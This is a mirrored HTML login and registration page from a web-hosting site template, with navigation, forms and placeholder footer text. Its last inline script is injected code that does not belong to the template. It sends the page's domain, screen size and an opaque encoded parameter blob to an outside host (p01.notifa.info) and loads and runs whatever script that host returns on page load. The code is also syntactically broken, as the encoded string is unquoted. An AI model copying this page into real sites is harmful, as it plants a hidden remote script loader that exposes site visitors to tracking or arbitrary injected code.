<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/login.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:20 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Login and Register</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-th-list"></i>
          <h1>Create Account</h1>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis.Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit uspendisse et justo.</p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Login and Register Section Start ========= -->

<section class="login_box">
  <div class="container">
    <div class="row">
      <div class="col-md-4 col-sm-4 col-xs-12">
        <form action="#" class="login_form">
          <div class="login_header">Login</div>
          <fieldset>
            <div class="section">
              <div class="row">
                <div class="col-md-12">
                  <label class="label">E-mail/Username</label>
                </div>
                <div class="col-md-12">
                  <label class="input"> <i class="icon-append fa fa-user"></i>
                    <input type="email">
                  </label>
                </div>
              </div>
            </div>
            <div class="section">
              <div class="row">
                <div class="col-md-12">
                  <label class="label">Password</label>
                </div>
                <div class="col-md-12">
                  <label class="input"> <i class="icon-append fa fa-lock"></i>
                    <input type="password">
                  </label>
                  <div class="note"><a href="#">Forgot password?</a></div>
                </div>
              </div>
            </div>
            <div class="section">
              <div class="row">
                <div class="col-md-12"></div>
                <div class="col-md-12">
                  <label class="checkbox">
                    <input name="checkbox-inline" checked="checked" type="checkbox">
                    <i></i>Keep me logged in</label>
                </div>
              </div>
            </div>
          </fieldset>
          <div class="login_footer">
            <button type="submit" class="button">Log in</button>
          </div>
        </form>
      </div>
      <div class="col-md-8 col-sm-8 col-xs-12">
        <form action="#" class="login_form">
          <div class="login_header">Registration</div>
          <fieldset>
            <div class="row">
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"><i class="icon-append fa fa-user"></i>
                  <input placeholder="First name" type="text">
                </label>
              </div>
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"><i class="icon-append fa fa-user"></i>
                  <input placeholder="Last name" type="text">
                </label>
              </div>
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"> <i class="icon-append fa fa-user"></i>
                  <input placeholder="Username" type="text">
                </label>
              </div>
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"> <i class="icon-append fa fa-envelope"></i>
                  <input placeholder="Email address" type="text">
                </label>
              </div>
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"> <i class="icon-append fa fa-lock"></i>
                  <input placeholder="Password" type="password">
                </label>
              </div>
              <div class="section col-md-6 col-sm-6 col-xs-12">
                <label class="input"> <i class="icon-append fa fa-lock"></i>
                  <input placeholder="Confirm password" type="password">
                </label>
              </div>
              <div class="clear"></div>
              <div class="section col-md-12 col-sm-12 col-xs-12">
                <label class="checkbox">
                  <input name="checkbox" type="checkbox">
                  <i></i>I agree to the Terms of Service</label>
                <label class="checkbox">
                  <input name="checkbox" type="checkbox">
                  <i></i>I want to receive news and  special offers</label>
              </div>
            </div>
          </fieldset>
          <div class="login_footer">
            <button type="submit" class="button">Submit</button>
          </div>
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Login and Register Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X4UeUhIt%2bWyGABuPFrsFMBlsLcnSlqQdS8z9DsXPQA0Kyc4c%2fIJt%2fP%2fWa0R7aIelAC4Es0xBnPzdaBB%2fKMMXGdFv11wt6k1ttf89Y6mKh51vsfywnYYpCq542ibaZ0N6BX91qRwS7qUzvr%2bfPwy05wttnN1n%2b3xNw%2b5H1Su0z3RH6K2j3bVrhiy2sdzaUe3XudGvh%2boEcaI%2fUrbdeFhRKOh%2b9duoKv3vG3gGP7pssR8ax1H6JirTRff5JakwLJijO7ZdgpDbgcbVhKZMJUnYR1V9VZfgAerPeOILgRYjtWE1ouiXWlSVlKbS%2b%2bRgF3QU93yg9IC1iVCuu4rkrIx1g9LwMNtaTn4Ca9E7q4Y3IR799M2hzuzZX3NHLYkI%2boKVWgRen%2fWnXABRt6BewQGy0%2bM%2bOlSQ%2fNavxsaZC2GuYZcB9PbSTdayM9hqVBVjty8IDaT8kNy6dvn2r0VEVyDxxhPtJEWySSqtWE%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/login.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:20 GMT -->
</html>
